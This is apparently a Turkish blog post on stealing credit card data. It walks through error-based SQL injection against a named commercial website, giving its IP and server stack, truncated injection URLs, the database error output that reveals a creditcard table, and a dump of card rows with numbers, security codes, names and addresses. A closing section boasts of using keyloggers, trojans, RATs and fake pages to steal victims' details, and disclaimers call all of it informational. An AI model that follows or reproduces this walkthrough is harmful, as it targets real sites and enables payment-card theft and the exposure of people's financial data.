öncelikle bilgi çalmanın çeşitli yolları oldugunu unutmayalım belki benim bilgimin yetersiz kaldıgı ve benim bakmaya değer vermediğim yerde sizlerin basit bir yöntemle bilgi çalabileceği unutulmamalı ve en önemlisi Şifreyi kırmaya gerek yok ! Aptallığın yerini bulman yeterlidir...
İlk Yöntem:
Tamamen hack bilgisi gerektirmekte oldugu için üstün körü anlatacağım SQL İnjection teknigi kullanarak CC leri ele geçirmek oldukça zordur ama imkansız değildir bakalım şimdi öncelikle kurban lazım bize bakalım bulabilecekmiyiz
Target: http://www.hexonline.co.uk/Product.php?cid=63
Host IP: 188.121.41.53
Web Server: Microsoft-IIS/7.0
Powered-by: ASP.NET
DB Server: MySQL
Current DB: hexonlineDB
evet bir kurban bulduk
kurban:http://www.hexonline.co.uk/
evet Sql İnjection açığı nerde bakalım şimdi
http://www.hexonline.co.uk/Product.php?cid=63 onuda bulduk nasıl kontrol edeceze gelince ilerde belki detaylı Sql İnjection açığjnı anlatırım o zaman herşeyi detaylı şekilde anlatırım Sql açığı kullanarak db ye ve diğer bilgilerin saklandıgı veri tabanı tabloları ve kolonlarına ulaşım saglamayı deneyeceğiz şimdi nasılmı bakalım
http://www.hexonline.co.uk/Product.php?c...y+x)z)--+- sayfada bir alan göreceksiniz orda error Duplicate entry ':information_schema,hexonlineDB1' for key 'group_key' Error alırken db adınıda aldık şimdi db de ne arayacağız ona bakalım
http://www.hexonline.co.uk/Product.php?c...y+x)z)--+-
evet onlarda geldi error Duplicate entry ':address,category,cctype,creditcard,email,manufacturer,media,new' for key 'group_key'
şimdi hedefimize gidelim değil mi neydi hedef CC bilgilerini çalmak
ve bunu tamamen şova dönüştürmeden bu yöntemle siteden ne çektigimi sizlerle paylaşayım bari kısa yoldan gidelim diğer yöntemi anlatamıcam yoksa
cc_number cc_id user_id secure_code cc_type cc_exp_month cc_exp_year cc_name cc_address cc_state cc_zip cc_save cc_city
4123456789012 1 1 9 1999 Visa 123 Bingo St, Los Angeles, CA 90230 1 60500 Y Multan
4123456789012 2 1 Master Card 2 2022 Ali Kashif House 108 1 60500 N Multa
4123456789012 3 1 Master Card 3 2022 Ali Kashif sfdfs dsdfsd ds fds ds 1 60500 N dffsdfds
4123456789012 4 1 125 Master Card 4 2021 Ali Kashif House 108 B 1 60500 Y Multan
bunlar siteden çekilenler örnek olsun diye yapılmış ve bilgi amaçlıdır ne site yönetimi nede paylaşan burada paylaşılan bilgilerin kötüye kullanımı ile sorumlu değildir
İkinci Yöntem:Bilgi teknolojileri geliştikçe zaman içinde kullanımda arttı bilgisayar ve akıllı telefonlardan banka hesaplarına ulaşmak Kredi Kartı ile alış veriş yapmak insanlara oldukça rahat geliyor peki ya güvenli,k işte burda saldırgan giriyor devreye yani biz giriyoruz Keyloger Truva atları (trojen) rat ve bir çok fake sayfa oluşturarak çeşitli yöntemler kullanara tamamen kişileri hackleyerek tüm bilgilerini çalıyoruz.
Dip Not:Anlatım Basitleştirilmiş ve Sadece Bilgi Amaçlı Paylaşılmıştır yapılan veya bulunan hiçbir cc den biz sorumlu değilizdir böyle işlere bulaşmanızıda kesinlikle tavsiye etmemekteyiz.
Yorum Gönder